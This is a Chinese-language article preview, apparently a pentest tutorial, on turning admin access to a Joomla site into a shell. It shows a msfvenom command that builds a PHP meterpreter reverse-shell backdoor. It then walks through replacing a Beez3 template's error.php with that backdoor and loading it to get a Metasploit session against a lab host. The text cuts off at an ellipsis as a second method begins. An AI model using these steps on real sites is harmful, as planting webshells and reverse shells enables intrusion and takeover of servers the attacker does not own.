Joomla后台模板Getshell技巧

文章预览

文章前言 本篇文章我们主要介绍在获取到Joomla后台管理权限的情况下如何通过后台来实现Getshell的两种利用方式 GetShell Metasploit 首先我们使用site_admin/123456登录Joomla后台 在获取到Joomla的后台操作权限后我们可以通过在后台修改主题文件的方式来获取shell权限，这里我们随意选择一个主题 选择查看模板文件的详细信息 选择error.php文件 然后使用msfvenom来生成要给php后门文件 #PHP后门文件 msfvenom -p php/meterpreter/reverse_tcp LHOST= LPORT= On > -f raw > shell.php 然后使用我们之前在msfvenom中生成的webshell文件内容替换上面error.php文件内容 保存后访问Beez3主题下的error.php文件便可成功的突破边界 http: / /192.168.204.137/joomla /templates/beez 3/error.php 随后在我们的MSF中获取到一个会话 GetShell-2 这里我们介绍另外一种GetShell的方法，此方法和上面的方法类似，只是用的脚本不同，我们 ………………………………